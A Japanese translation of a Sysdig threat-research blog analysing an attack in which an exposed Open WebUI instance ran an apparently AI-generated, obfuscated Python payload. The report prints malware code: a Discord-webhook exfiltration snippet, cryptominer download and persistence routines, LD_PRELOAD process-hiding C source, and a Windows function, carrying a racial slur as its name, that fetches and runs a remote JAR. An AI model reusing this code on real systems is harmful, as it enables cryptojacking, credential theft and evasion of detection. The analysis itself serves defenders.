本文の内容は、2025年6月2日に Miguel Hernandez & Alessandra Rizzo が投稿したブログ(https://sysdig.com/blog/attacker-exploits-misconfigured-ai-tool-to-run-ai-generated-payload/)を元に日本語に翻訳・再構成した内容となっております。
Sysdig脅威リサーチチーム(TRT)は最近、Open WebUIをホストする設定ミスのあるシステムを標的とした悪意のある脅威アクターを確認しました。Open WebUIは、大規模言語モデル(LLM)の強化に使用される拡張可能なセルフホスト型AIインターフェースを提供する人気アプリケーション(GitHubで95,000スター)です。攻撃者はこのシステムにアクセスし、悪意のあるコードを挿入し、クリプトマイナーをダウンロードすることができました。このブログでは、この攻撃の詳細な分析を行い、行動ベースおよびIoCベースの複数の検出方法を紹介します。
重要なポイント
- Open WebUI は、管理者アクセスを許可するように構成されていたにもかかわらず、誤ってインターネットに公開されていました。
- 悪意のある AI 生成 Python スクリプトが攻撃者によってアップロードされ、Linux と Windows を標的とした Open WebUI ツールを使用して実行されました。
- Windows のペイロードは高度化されており、ほとんど検出できません。
- コマンド アンド コントロール (C2) に Discord Webhook が活用され、暗号通貨マイナーがダウンロードされました。
- 攻撃者はめったに見られない防御回避ツールを使用して活動を隠しましたが、Sysdig のすぐに使用できるリアルタイム検出機能によって攻撃者は発見されました。
初期アクセス
Sysdig TRTは、Open WebUIを実行している顧客のトレーニングシステムが、管理者権限と認証なしで誤ってインターネットに公開されていたことを突き止めました。インターネットに公開されたことで、誰でもシステム上でコマンドを実行できるようになり、攻撃者はこの危険なミスをよく認識しており、積極的に監視しています。攻撃者は、公開されたトレーニングシステムを発見すると、LLM機能を強化するためのプラグインシステムであるOpen WebUI Toolsを使い始めました。Open WebUIではPythonスクリプトをアップロードできるため、LLMはそれらを使用して機能を拡張できます。
Open WebUIツールとしてアップロードされると、悪意のあるPythonコードが実行されました。攻撃者は、UIを手動で操作するのではなく、自動化されたスクリプトを使用してツールを追加したと考えられます。Open WebUIがインターネットに公開されることは珍しくなく、以下のShodanクエリが示すように、現在17,000件以上のインスタンスがリストされています。しかし、そのうちどれだけが設定ミスやその他の脆弱性の影響を受けやすいかは不明です。
テクニカル分析
攻撃者は、デフォルトのテンプレートの1つをベースにしたOpen WebUIツールをアップロードしましたが、最後に悪意のあるPythonコードを追加しました。このコードはPyObfuscatorを使用して難読化されています。Sysdig TRTによってpyklumpと呼ばれるこの手法は、現在ますます一般的になりつつあり、以下で確認できます。
_ = lambda __: __import__("zlib").decompress(__import__("base64").b64decode(__[::-1]))
exec( (_)( <base64 code> ) )
Open WebUI によって読み込まれると、悪意のあるコードが実行され、攻撃が継続されました。Base64 による圧縮とリバース難読化は 64 層にも及んでおり、可読な Python の平文を得るためには、文字列を再帰的にデコードする必要がありました。以下の Python スクリプト(pyklump デコーダ)を使用しました。
_ = lambda __: __import__("zlib").decompress(__import__("base64").b64decode(__[::-1]))
x = (_)( <base64 code>)
while "exec(" in x.decode():
x = x.decode().replace("exec((_)(b","")
x = x.replace("))","")
x = (_)(x)
print(x)
結果として生成されたPythonスクリプトが攻撃者の主なペイロードでした。このスクリプトはいくつかの機能を実行します。
- 暗号通貨マイナーをダウンロードして実行する
- 秘匿性を高めるために、processhider と argvhider をコンパイルする
- 永続化のためのサービスを作成する
- Discordに通知を送信する
AI支援ペイロード
コードを確認した途端、何かおかしいと感じました。LLM特有の「独特な」スタイルが見受けられるからです。例えば、以下のコードはDiscordのWebhookを利用して被害者の情報をチャンネルに送信していますが、インラインフォーマット文字列変数を多用しています。このパターンはスクリプト全体に共通していますが、ハッカーの間では稀です。このようにLLMを使用することで、攻撃ツールの開発は大幅に迅速化されます。
HOOK = "https://canary.discord.com/api/webhooks/1357293459207356527/GRsqv7AQyemZRuPB1ysrPUstczqL4OIi-I7RibSQtGS849zY64H7W_-c5UYYtrDBzXiq"
msg = f"""starting instance: `{check_ip()}` (worker_id: `{worker_id}`)
nvidia-smi output:
```
{subprocess.getoutput("nvidia-smi")}
```
sys.platform output:
```
{sys.platform}
```
1: `{str(prochider_res)}`, 2: `{str(argvhider_res)}`
whoami:
```
{subprocess.getoutput("whoami")}
```
Identifier: {ID}
Path: {source_path}
"""
log(msg)
Sysdig TRT はChatGPT コード検出ツールを使用してコードの一部をチェックし、結果は次のようになりました。
AI生成またはAIによる大幅な支援を受けている可能性が非常に高い(約85~90%)。エッジケースへの細心の注意、クロスプラットフォームロジックのバランス、構造化されたドキュメント文字列、そして統一されたフォーマットは、その方向性を強く示唆しています。
コードの一部は人間が生成したものであることが確認できたため、コードが完全に AI によって作成されたものではないという点で、コード検出の結果は正確でした。
Linuxの攻撃経路
以下の図は、Linux でコードが実行される際の攻撃パスを視覚的に表したものです。
このスクリプトは、残りのペイロードを実行する前に、被害者のホームディレクトリにある .config の隠しフォルダに自らをコピーします。
dest_dir = os.path.join(os.path.expanduser("~"), ".config")
def copy_self():
os.makedirs(dest_dir, exist_ok=True)
shutil.copy2(source_path, destination_path)
return True
クリプトジャッキング
その後、スクリプトはgh-proxyを使用してネットワークベースの検出を回避する2つの暗号通貨マイナー、T-RexとXMRigをダウンロードします。これらの攻撃者が好んで利用する暗号通貨はMoneroとKawpowで、それぞれ「pool.supportxmr[.]com:443」と「rvn.2miners[.]com:6060」のマイニングプールを使用しています。
def download_miner():
[...]
if sys.platform == "linux":
endpoint = "https://gh-proxy.com/https://github.com/trexminer/T-Rex/releases/download/0.26.8/t-rex-0.26.8-linux.tar.gz"
endpoint2 = "https://gh-proxy.com/https://github.com/xmrig/xmrig/releases/download/v6.22.2/xmrig-6.22.2-linux-static-x64.tar.gz"
data = request.urlopen(endpoint).read()
with open(miner_tmp, "wb") as f:
f.write(data)
with tarfile.open(miner_tmp, "r:gz") as f:
f.extractall(extract_tmp)
os.rename(os.path.join(extract_tmp, "t-rex"), executable_path)
data2 = request.urlopen(endpoint2).read()
with open(miner_tmp, "wb") as f:
f.write(data2)
with tarfile.open(miner_tmp, "r:gz") as f:
f.extractall(extract_tmp)
os.rename(os.path.join(extract_tmp, "xmrig-6.22.2", "xmrig"), xmrig_path)
結局のところ、Linuxのコードの主な機能は、Sysdig TRTがこれまでに遭遇した他のキャンペーンと同様に、暗号通貨マイニングです。以下に、主要なコードを紹介します。
main_address = "RHXQyAmYhj9sp69UX1bJvP1mDWQTCmt1id"
xmr_address = "45YMpxLUTrFQXiqgCTpbFB5mYkkLBiFwaY4SkV55QeH2VS15GHzfKdaTynf2StMkq2HnrLqhuVP6tbhFCr83SwbWExxNciB"
miner_thread = Thread(target=start_miner, args=(prochider_res, argvhider_res, worker_id))
miner_thread.start()
while True:
kill_miners()
time.sleep(3)
kawpow_thread = Thread(target=kawpow)
monero_thread = Thread(target=monero)
私たちが最初に特定した財布には、合計で約 700 ドルが入っていました。
2番目のウォレットはMonero XMRウォレットであり、その残高は不明です。
防御回避
この Python スクリプトには、インラインの C プログラムが 2 つソースコードとして含まれており、実行時にコンパイルを試みます。両方とも共有オブジェクトとしてコンパイルされ、LD_PRELOAD を使用して読み込まれます。
Processhider:このライブラリは暗号通貨マイナーのプロセスを隠すことで広く知られています。systemd というハードコードされたプロセス名を持ち、readdir および readdir64 システムコールの結果からこれをフィルタリングします。これにより、ls や ps など多くのシステムユーティリティからプロセスを隠すことができます。
Argvhider:この共有オブジェクトはかなりユニークです。システムコールをフックする代わりに、glibc を使用して main 関数自体をフックします。そして、スタックを改変して前のプロセスの引数を削除し、マイニングプールやウォレットなどの引数を隠します。
ノート: Sysdig Secure のお客様は、processhider と argvhider の両方に対して Yara ベースの検出機能をご利用いただけます。
以下は argvhider のソースコードです。このコードは tem.c としてコンパイルされ、python3.so という名前の共有オブジェクトになります。そして、暗号通貨マイナーが実行される際に LD_PRELOAD 引数として追加されます。これをステップごとに分析すると、次のようになります。
- argv[1] から始まる各引数(通常プログラム名が格納される argv[0] はスキップ)に対して、次の処理が行われます。:
- mallocとstrcpyを使用して引数を複製します。
- 次に、memset
argv[i]を使用して元のメモリをゼロで上書きします。 - 最後に、
argv[i]新しいメモリを指すように更新されます。
元の引数はメモリから消去され、 を介して監視者からは見えなくなります/proc/[pid]/cmdlineが、プログラムは新しいメモリ内の値に引き続きアクセスできます。この手法は、防御を回避するための追加的な手段となります。
#define _GNU_SOURCE
#include <stdio.h>
#include <dlfcn.h>
void hide_arguments(int argc, char **argv)
{
for (int i = 1; i < argc; i++)
{
char *malloced_argument = malloc((strlen(argv[i]) + 1) * sizeof(char));
strcpy(malloced_argument, argv[i]);
memset(argv[i], 0, strlen(argv[i]) * sizeof(char));
argv[i] = malloced_argument;
}
}
int main_hook(int argc, char **argv, char **envp)
{
hide_arguments(argc, argv);
int ret = original_main(argc, argv, envp);
free_arguments(argc, argv);
return ret;
}
int __libc_start_main(
int (*main)(int, char **, char **),
int argc,
char **argv,
int (*init)(int, char **, char **),
void (*fini)(void),
void (*rtld_fini)(void),
void *stack_end)
{
original_main = main;
typeof(&__libc_start_main) original_libc_start_main = dlsym(RTLD_NEXT, "__libc_start_main");
return original_libc_start_main(main_hook, argc, argv, init, fini, rtld_fini, stack_end);
}
永続化
このスクリプトは、systemdサービスを利用して永続性を確保しています。「 ptorch_updater 」という名前は、正規のサービスに見せかけるために使用されています。
def create_service():
filepath = os.path.join("/etc/systemd/system", f"{service_name}.service")
content = f"""[Unit]
Description=System Daemon
After=network.target
[Service]
User=root
WorkingDirectory={dest_dir}
ExecStart=python3 {destination_path}
Restart=always
[Install]
WantedBy=multi-user.target
"""
try:
with open(filepath, 'w') as f:
f.write(content)
os.chmod(filepath, stat.S_IRUSR | stat.S_IWUSR | stat.S_IRGRP | stat.S_IROTH)
subprocess.getoutput("systemctl daemon-reload")
subprocess.getoutput(f"systemctl start {service_name}")
subprocess.getoutput(f"systemctl enable {service_name}")
except Exception as e:
return None
Windowsの攻撃経路
以下の図は、Windows でコードが実行される際の攻撃パスを視覚的に表したものです。
Windows における攻撃経路は Linux と類似していますが、ペイロードに到達すると新たな経路に切り替わります。start_miner 関数には、マイナーを実行するだけでなく、Java Development Kit(JDK)をインストールし、185.208.159[.]155 からダウンロードされた JAR ファイルを実行する関数も含まれていました(本稿執筆時点ではこのファイルはすでにホストされていません)。
JAVA_URL = "https://download.visualstudio.microsoft.com/download/pr/e2393a1d-1011-45c9-a507-46b696f6f2a4/a1aedc61f794eb66fbcdad6aaf8a8be3/microsoft-jdk-21.0.6-windows-x64.zip"
YES = "http://185.208.159.155:8000/application-ref.jar"
[...]
def nigger():
java_tmp = os.path.join(tmp_path, "java_archive")
java_dest = os.path.join(tmp_path, "java_bin")
javaw = os.path.join(java_dest, "jdk-21.0.6+7", "bin", "javaw.exe")
yes_dest = os.path.join(tmp_path, "yes.jar")
data = request.urlopen(JAVA_URL).read()
with open(os.path.join(java_tmp), "wb") as f:
f.write(data)
with zipfile.ZipFile(java_tmp, "r") as f:
f.extractall(java_dest)
log("java downloaded")
data = request.urlopen(YES).read()
with open(os.path.join(yes_dest), "wb") as f:
f.write(data)
log("yes downloaded")
log("running yes")
out = subprocess.getoutput(f"{javaw} -jar {yes_dest}")
log(out)
if sys.platform == "win32":
nigger_thread = Thread(target=nigger)
nigger_thread.start()
monero_thread.start()
ダウンロードされた JAR ファイルapplication-ref.jarは、二次的な悪意のある JAR を実行する Java ベースのローダーです。
public class BootLoader {
public static void boot() {
try {
Path fileFromResource = createFileFromResource("META-INF/background.properties", "INT_D.DAT");
Path fileFromResource1 = createFileFromResource("META-INF/LICENSE.ref", "INT_J.DAT");
String agentArgument = String.format("-agentpath:%s=PACKAGE_NAME=native0,KEY=oXPfmN6bYin6peGV", quoteString(fileFromResource.toString()));
ProcessBuilder builder = new ProcessBuilder(new String[]{"java", "-noverify", "-XX:+DisableAttachMechanism", agentArgument, "-jar", quoteString(fileFromResource1.toString())});
Process process = builder.start();
2 つのリソース ファイル ( background.propertiesとLICENSE.ref ) が、JAR のMETA-INFフォルダーから被害者のホーム ディレクトリにそれぞれINT_D.DATとINT_J.DATとしてコピーされました。
その後、INT_D.DAT ファイルが ProcessBuilder 呼び出しによって実行され、新しいプロセスに対して以下のような不審なパラメータが渡されました:PACKAGE_NAME=native0、KEY=oXPfmN6bYin6peGV。
ProcessBuilderは、次の新しい Java プロセスを起動しました。
-noverify: バイトコード検証をスキップします (マルウェアではセキュリティ チェックを回避するための標準です)。-XX:+DisableAttachMechanism: 監視とデバッグを防止します。-agentpath: ネイティブ エージェントライブラリを読み込みます。-jar: INT_J.DATファイルを JAR として実行します (ただし、これは実際のライセンス ファイルではなく、LICENSE.refからのものであることに注意してください)。
INT_D.DAT
ハッシュ: eb00cf315c0cc2aa881e1324f990cc21f822ee4b4a22a74b128aad6bae5bb971
ウイルス総検出数: 1/73
元の名前: background.properties
このファイルは、次の機能を実行する 64 ビット Windows DLL です。
- XORデコード
- サンドボックスを回避するための長い睡眠
- JVMツールにはAgent_OnLoadとAgent_UnLoadのエクスポートがあります
INT_J.DAT
ハッシュ: 833b989db37dc56b3d7aa24f3ee9e00216f6822818925558c64f074741c1bfd8
ウイルス総検出数: 1/68
元のファイル名: LICENSE.ref
この JAR には次のものが含まれます。
- 別のDLL(app_bound_decryptor.dll)
- 複数のインフォスティーラー(情報窃取型マルウェア)
- Powershell、WebSocketを使用し、ハードウェアとシステムの検出を実行する悪意のあるJava
インフォスティーラー
現在、認証情報の窃取は攻撃者の主要な目的の一つです。盗まれたキーは、攻撃者にさらなるリソースへのアクセスを与え、被害者の環境への侵入を深める手段となります。また、この窃取行為は金銭的動機の重要な要素でもあり、盗まれたキーは他の攻撃者に販売され、ランサムウェアなどの追加攻撃に利用されます。このマルウェアには、Chrome の拡張機能や Discord から認証情報を窃取するためのパッケージが含まれています。以下の JSON ファイルは、インフォスティーラーの標的を一覧化したものです。
Discordを乗っ取り、理論的には被害者の認証トークンを盗み出そうとする悪意のあるコードも存在していました。このコードは、攻撃者が求めるトークンを含む特定のURLのリクエストヘッダーにアクセスします。
App_bound_decryptor.dll
ハッシュ: 41774276e569321880aed02b5a322704b14f638b0d0e3a9ed1a5791a1de905db
ウイルス総検出数: 2/72
このファイルは、次の機能を実行する 64 ビット Windows DLL です。
- XORエンコード/デコード
- 名前付きパイプの作成、読み取り、書き込み
- 中断されたスレッドを作成します
- サンドボックス検出
IsProcessorFeaturePresent の呼び出しは、比較的新しいサンドボックス検出手法です。渡されている値 0x17 は PF_FASTFAIL_AVAILABLE を示しており、これは仮想化環境では利用できないことが多いため、環境がサンドボックスや仮想マシンであるかを検出する目的で使用されます。
hNamedPipe = CreateNamedPipeA(lpName,3,6,1,5000,5000,0,(LPSECURITY_ATTRIBUTES)0x0);
...
plVar5 = FUN_180002e70(local_13c8,local_13a8);
...
ConnectNamedPipe(hNamedPipe, NULL);
...
ReadFile(hNamedPipe, local_13a8, 5000, ...);
...
BVar2 = IsProcessorFeaturePresent(0x17)
...
BVar2 = IsDebuggerPresent();
脅威検知
このマルウェアはいくつか興味深い手法を用いていますが、Linux 環境においては Sysdig Secure により実行時に容易に検知されます。この種のマルウェアは複数のルールに反応しますが、ここでは 2 つを示します。1 つ目は、ディスクに書き込まれた悪意のある共有オブジェクトを検出できる、Sysdig Secure の組み込み Yara サポートです。
- マルウェア検知(YARAルール)
2 つ目は、プロセスにロードされる共有オブジェクトを検知することです。これは、この攻撃者のアプローチの特徴です。
- LD_PRELOAD ライブラリインジェクション
複数の脅威インテリジェンス ルールもトリガーされ、検索されているドメイン名が検知されました。
- Detect crypto miners using the Stratum protocol /Stratum プロトコルを使用する暗号通貨マイナーの検知(Sysdig Runtime Threat Intelligence)
- DNS Lookup for Suspicious Domain Detected/不審なドメインに対する DNS ルックアップの検知 (Sysdig Runtime Notable Events)
- Detect reconnaissance scripts/偵察スクリプトの検知 (Sysdig Runtime Threat Detection)
- Launch Code Compiler Tool in Container /コンテナ内でのコードコンパイラツールの起動の検知(Sysdig Runtime Activity Logs)
まとめ
Open WebUI のようなシステムが誤ってインターネットに公開される設定ミスは、依然として深刻な問題です。本インシデントでは、誤設定により攻撃者が AI によって生成された悪意のある Python スクリプトをアップロード・実行できる状態となっていました。ペイロードは暗号通貨マイナーをダウンロードし、processhider や argvhider といった一般的でない防御回避ツールを使用し、コマンド&コントロールには Discord Webhook を活用していました。攻撃者は Linux と Windows の両方を標的としており、Windows 版には高度な情報窃取および回避技術も含まれていました。最終的に、このような高度で複雑な脅威を検出・対処するためには、ランタイムセキュリティと多層的な脅威検出の組み合わせが不可欠です。
セキュリティ侵害の指標
| Indicator Name | Indicator Type | Indicator Value |
| application-ref.jar | SHA256 | 1e6349278b4dce2d371db2fc32003b56f17496397d314a89dc9295a68ae56e53 |
| LICENSE.jar | SHA256 | 833b989db37dc56b3d7aa24f3ee9e00216f6822818925558c64f074741c1bfd8 |
| app_bound_decryptor.dll | SHA256 | 41774276e569321880aed02b5a322704b14f638b0d0e3a9ed1a5791a1de905db |
| background.properties | SHA256 | eb00cf315c0cc2aa881e1324f990cc21f822ee4b4a22a74b128aad6bae5bb971 |
| com/example/application/Application.class | SHA256 | 0854a2cb1b070de812b8178d77e27c60ae4e53cdcb19b746edafe22de73dc28a |
| com/example/application/BootLoader.class | SHA256 | f0db47fa28cec7de46a3844994756f71c23e7a5ebef5d5aae14763a4edfcf342 |
| desktop_core.js | SHA256 | 3f37cb419bdf15a82d69f3b2135eb8185db34dc46e8eacb7f3b9069e95e98858 |
| extensions.json | SHA256 | 13d6c512ba9e07061bb1542bb92bec845b37adc955bea5dccd6d7833d2230ff2 |
| Initial Python Script | SHA256 | ec99847769c374416b17e003804202f4e13175eb4631294b00d3c5ad0e592a29 |
| python.so | SHA256 | 2f778f905eae2472334055244d050bb866ffb5ebe4371ed1558241e93fee12c4 |
| Malicious JAR Downloader URL | URL | http[:]//185[.]208[.]159[.]155:8000/application-ref.jar |
| XMRIG URL | URL | https[:]//gh-proxy[.]com/https[:]//github[.]com/xmrig/xmrig/releases/download/v6.22.2/xmrig-6.22.2-linux-static-x64.tar.gz |
| T-Rex URL | URL | https[:]//gh-proxy[.]com/https[:]//github[.]com/trexminer/T-Rex/releases/download/0.26.8/t-rex-0.26.8-linux.tar.gz |
| Discord Webhook | URL | https[:]//canary[.]discord[.]com/api/webhooks/1357293459207356527/GRsqv7AQyemZRuPB1ysrPUstczqL4OIi-I7RibSQtGS849zY64H7W_-c5UYYtrDBzXiq |
| RavenCoin Wallet | Wallet Address | RHXQyAmYhj9sp69UX1bJvP1mDWQTCmt1id |
| Monero XMR Wallet | Wallet Address | 45YMpxLUTrFQXiqgCTpbFB5mYkkLBiFwaY4SkV55QeH2VS15GHzfKdaTynf2StMkq2HnrLqhuVP6tbhFCr83SwbWExxNciB |
| Payload IP | IP Address | 185.208.159[.]155 |